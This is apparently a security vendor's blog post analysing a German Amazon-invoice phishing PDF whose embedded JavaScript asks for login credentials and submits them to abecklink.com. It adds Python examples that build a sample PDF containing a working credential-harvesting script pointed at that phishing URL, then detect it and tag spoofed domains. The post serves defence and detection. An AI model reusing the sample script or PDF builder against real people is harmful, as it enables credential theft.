The PDF invoice that phished you

Blog 5 of a 5-part series on advanced research into modern phishing attacks

Tomislav Peričin, Chief Software Architect & Co-Founder at ReversingLabs

Phishing attacks are deception attempts that try to trick a person into clicking a link that leads to a credential-stealing page or a malicious application download. Relying on social engineering tactics, they have the potential to grant attackers unauthorized access to infrastructure, services, or information. Delivered through most means of modern communication, these kinds of attacks pose a great threat to any organization. That is why it is crucial to strengthen the defenses and cover all possible phishing target vectors.

One such vector that is easy to overlook is credential theft via JavaScript-enabled documents. This technique does not rely on a malicious link or a spoofed domain in the email body; a script inside the attached document produces the same effect.

ReversingLabs has recently detected a few variants of such phishing attacks in the wild. All of them start with an innocuous-looking email such as the following.

Screenshot of a German email in Mozilla Thunderbird from “marketplace-messages@amazon.de” with the subject “Rechnung über Ihre Verkaufsgebühren bei Amazon.de [10/2018]”. The message informs the recipient about an attached tax invoice PDF for October 2018 and includes instructions on verifying a digital signature.

When run through an automated language translation service, the message reads something like this.

Screenshot of the same email in Mozilla Thunderbird as image 1, but in English. The subject and structure are the same, explaining the attached tax invoice and providing steps to verify the digital signature.

It sounds convincing. An inattentive reader might miss that the sender addresses do not match up (the message claims to come from amazon.de, but the actual sending domain is abecklink.com) and open the attached invoice, a mistake that can end in a successful phish. Opened in Adobe Acrobat Reader, the attachment presents the following input dialog.

Screenshot of a PDF file opened in Adobe Reader showing a JavaScript dialog box requesting Amazon login credentials—email address and password. A red warning at the bottom says “Warning: JavaScript Window”.

The document asks the reader to log in before it will show the tax records. The email has primed them to expect this screen and to believe that typing their credentials into it will reveal the account summary. Unusual as it is, an inattentive reader might brush it off as a security feature meant to protect their private information. But what is going on behind the scenes?

ReversingLabs A1000 visualizes the document structure and allows analysts to browse its contents organized by object type. The image below shows the ins and outs of the attached PDF.

Screenshot showing the internal structure of a malicious PDF file. It lists items such as fonts, scripts, and content streams, along with their format, number of files, and sizes. The file name is "INVOICE.pdf".

Active script content is located in the folder named scripts. There is only one script, and its preview in the A1000 interface shows what happens once the reader provides their credentials.

Screenshot of JavaScript code extracted from the malicious PDF. It defines a fake dialog asking for Amazon credentials and shows code that submits the data to a phishing URL.

This short JavaScript code sends the provided credentials in plain text over HTTP to a remote web server. Even without reading the JavaScript, it is possible to reach the same conclusion, because A1000 summarizes the script's behaviour as indicators: its intent is automatically translated into a human-readable description, as shown below.

Screenshot of an “Indicators” panel listing suspicious behaviors of the PDF. It shows that the document launches a URL, submits a form, closes itself, and displays a dialog box—classified under NETWORK, DOCUMENT, and ANOMALY categories.

These indicators make it clear that the attached document is nothing more than a phish by another name: a document-based phish.

Deception is at the core of most email phishing attacks, and there is an ever-increasing number of ways a user can be misled into visiting a deceptive link. Because some of those links are hidden deep within document scripts, ReversingLabs has expanded its Titanium platform with the capability to detect them.

Detection starts with the ability to extract links from binary and textual files. Every extracted link is shown in the Interesting strings section of the file within which it was found. For the script analyzed above, the list of interesting strings contains the following two items.

Screenshot showing two suspicious HTTP URLs that mimic Amazon's Seller Central domain but actually point to "abecklink.com". They appear to be phishing links.
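As an added example (not code from the post, nor from A1000 or the Titanium platform), here is a small Python triage script that does the kind of extraction the screenshots illustrate: it walks the objects of a PDF, inflates FlateDecode streams, flags the dictionary keys and Acrobat JavaScript calls that correspond to the indicators above (dialog box, form submission, document close, URL launch), and pulls every http(s) URL out of the decoded content. The sample PDF is constructed inline around an OpenAction script modelled on the behaviour described above; the indicator names, the key watchlist and the JavaScript call list are my assumptions, and the hostname is the defanged URL IOC from the end of the post with the brackets removed.

```python
import re
import zlib

# Constructed sample script (not the code from the analysed PDF): it mimics the
# behaviour described above using real Acrobat JavaScript calls. The hostname is
# the defanged URL IOC from the end of this post, with the brackets removed.
PHISH_JS = b"""
var mail = app.response({cQuestion: "E-Mail-Adresse", cTitle: "Amazon Login"});
var pwd = app.response({cQuestion: "Passwort", cTitle: "Amazon Login", bPassword: true});
var url = "http://sellercentral.amazon.de.56U8GTHDGT4U7YWEWE84GTYS.abecklink.com/step1.php";
this.submitForm({cURL: url + "?e=" + mail + "&p=" + pwd, cSubmitAs: "HTML"});
this.closeDoc(true);
"""


def build_sample_pdf(js: bytes) -> bytes:
    """Build a minimal PDF whose /OpenAction runs `js` from a FlateDecode stream.

    Real samples store their scripts compressed, so a plain string search over
    the file finds neither the JavaScript calls nor the URL. The xref table is
    omitted (readers rebuild it) and analyze_pdf below does not need it.
    """
    packed = zlib.compress(js)
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /S /JavaScript /JS 5 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(packed)
        + packed + b"\nendstream",
    ]
    out = b"%PDF-1.7\n"
    for num, body in enumerate(objects, 1):
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj(.*?)endobj", re.S)
STREAM_START_RE = re.compile(rb"(?<!end)stream\r?\n")
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#@!$&'()*+,;=%-]+")

# Dictionary keys that give a document active content (assumed watchlist).
ACTIVE_KEYS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
               b"/SubmitForm", b"/URI", b"/Launch")
# Acrobat JavaScript calls mapped to indicator names like the ones A1000
# shows above (the names themselves are assumed).
JS_CALLS = {
    b"app.response": "DIALOG_BOX",      # asks the reader for input
    b"submitForm": "FORM_SUBMIT",       # sends data to a remote server
    b"closeDoc": "DOCUMENT_CLOSE",      # closes the document afterwards
    b"app.launchURL": "URL_LAUNCH",     # opens a URL in the browser
}


def decode_object(body: bytes) -> bytes:
    """Return an object body with its stream inflated when it is FlateDecode.

    The stream length comes from a direct /Length value when present; an
    indirect /Length (n 0 R) falls back to scanning for 'endstream'.
    """
    m = STREAM_START_RE.search(body)
    if not m:
        return body
    header, rest = body[:m.start()], body[m.end():]
    length = re.search(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)", header)
    if length:
        data = rest[:int(length.group(1))]
    else:
        data = re.split(rb"\r?\nendstream", rest, maxsplit=1)[0]
    if b"/FlateDecode" in header:
        try:
            data = zlib.decompress(data)
        except zlib.error:
            pass  # keep raw bytes; a stream that will not inflate is itself suspicious
    return header + data


def analyze_pdf(pdf: bytes) -> dict:
    """Collect active-content indicators and URLs from every object in the file."""
    indicators, urls = set(), set()
    for _num, _gen, body in OBJ_RE.findall(pdf):
        decoded = decode_object(body)
        for key in ACTIVE_KEYS:
            if re.search(re.escape(key) + rb"(?![A-Za-z])", decoded):
                indicators.add(key.decode())
        for call, name in JS_CALLS.items():
            if call in decoded:
                indicators.add(name)
        urls.update(u.decode("latin-1") for u in URL_RE.findall(decoded))
    return {"indicators": sorted(indicators), "urls": sorted(urls)}


if __name__ == "__main__":
    report = analyze_pdf(build_sample_pdf(PHISH_JS))
    print("indicators:", ", ".join(report["indicators"]))
    print("urls:", *report["urls"])
```

Running the script reports the /OpenAction, /JavaScript and /JS keys, the dialog, form-submit and close behaviours, and the single phishing URL, even though none of those strings are visible in the raw file. Object streams (/ObjStm), other filters such as /ASCIIHexDecode, and deliberately malformed object syntax are not handled here; a production extractor has to cope with all of them, which is precisely why attackers use them.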

Static analysis performed by the Titanium platform is not limited to files alone. Collected metadata goes through a post-processing step that converts it into indicators and tags. Tags, in turn, provide a succinct description of intent and allow pivoting through large datasets. Based on static link analysis, the following tags would be assigned to the script above.

  • #indicator-document
  • #indicator-network
  • #script
  • #string-http
  • #uri-domain-spoofed
  • #uri-hostname-length
  • #uri-subdomain-count
  • #web-request
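As an added example of how the link-derived tags in that list can be computed (my code, not the Titanium platform's, whose actual rules and thresholds are not described on this page), here is a Python tagger for extracted URLs. It derives #string-http, #uri-hostname-length, #uri-subdomain-count and #uri-domain-spoofed from the hostname alone. The brand watchlist, the two-level-suffix stand-in for the Public Suffix List and the numeric thresholds are assumptions; the first sample URL is the IOC from this post with the defanging brackets removed, the others are constructed.

```python
from urllib.parse import urlsplit

# Constructed watchlist of brands whose domains phishers like to embed in a
# hostname (assumption for this example; a real deployment maintains a list).
WATCHED_BRANDS = ("amazon.de", "amazon.com", "paypal.com", "microsoft.com")
# Minimal stand-in for the Public Suffix List (assumption): suffixes under
# which the registrable domain has three labels instead of two.
TWO_LEVEL_SUFFIXES = ("co.uk", "com.au", "co.jp")


def registrable_domain(host: str) -> str:
    """Return the part of the hostname that its owner actually registered."""
    labels = host.lower().rstrip(".").split(".")
    keep = 3 if ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES else 2
    return ".".join(labels[-keep:])


def tag_url(url: str, max_host_len: int = 40, max_subdomains: int = 3) -> list:
    """Derive link tags for one URL.

    Thresholds are assumptions chosen for this example. A brand counts as
    spoofed when its domain appears as whole labels inside the hostname but
    is not the registrable domain, which is exactly the trick in the IOC above:
    the reader sees sellercentral.amazon.de, the browser talks to abecklink.com.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    tags = set()
    if parts.scheme in ("http", "https"):
        tags.add("#string-http")
    if not host:
        return sorted(tags)
    owner = registrable_domain(host)
    if len(host) > max_host_len:
        tags.add("#uri-hostname-length")
    # labels in front of the registrable domain
    if host.count(".") - owner.count(".") > max_subdomains:
        tags.add("#uri-subdomain-count")
    if any(owner != b and f".{b}." in f".{host}." for b in WATCHED_BRANDS):
        tags.add("#uri-domain-spoofed")
    return sorted(tags)


def tag_links(urls) -> dict:
    """Tag a batch of links, e.g. everything extracted from one email and its attachments."""
    return {u: tag_url(u) for u in urls}


if __name__ == "__main__":
    samples = [
        # IOC from this post, brackets removed
        "http://sellercentral.amazon.de.56U8GTHDGT4U7YWEWE84GTYS.abecklink.com/step1.php",
        # constructed: the genuine host and a shorter spoof
        "https://sellercentral.amazon.de/gp/help",
        "https://www.amazon.de.login-check.example/",
    ]
    for u, t in tag_links(samples).items():
        print(u, " ".join(t))
```

The IOC picks up all four tags, the genuine Seller Central URL only #string-http, and the shorter spoof #uri-domain-spoofed without the length and subdomain tags, which is why the spoof check should not depend on the other two firing. The registrable-domain step matters: without it, "amazon.de" would match the legitimate host too and the tag would be noise rather than a pivot point.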

The tags that make this email stand out in the crowd are the link-derived ones: #uri-domain-spoofed, #uri-hostname-length and #uri-subdomain-count. Paired with the rest of our platform, these tags provide a simple way to navigate a large email dataset. This new feature arms defenders with insights and pivot points around every link shared with their organization, whether the link comes from the email body or from any of the message attachments. Based on those insights, a stricter set of policies can be created, increasing the overall security of the organization.

IOC:
MIME (SHA256) - 3078674d0a85602c12e70d795c1579f18513fcd1a740c638f49b121b853d07be

URL:
http://sellercentral[.]amazon[.]de[.]56U8GTHDGT4U7YWEWE84GTYS[.]abecklink[.]com/step1.php
http://sellercentral[.]amazon[.]de[.]56U8GTHDGT4U7YWEWE84GTYS[.]abecklink[.]com


Read our prior blog in the series on Catching lateral movement in internal emails.

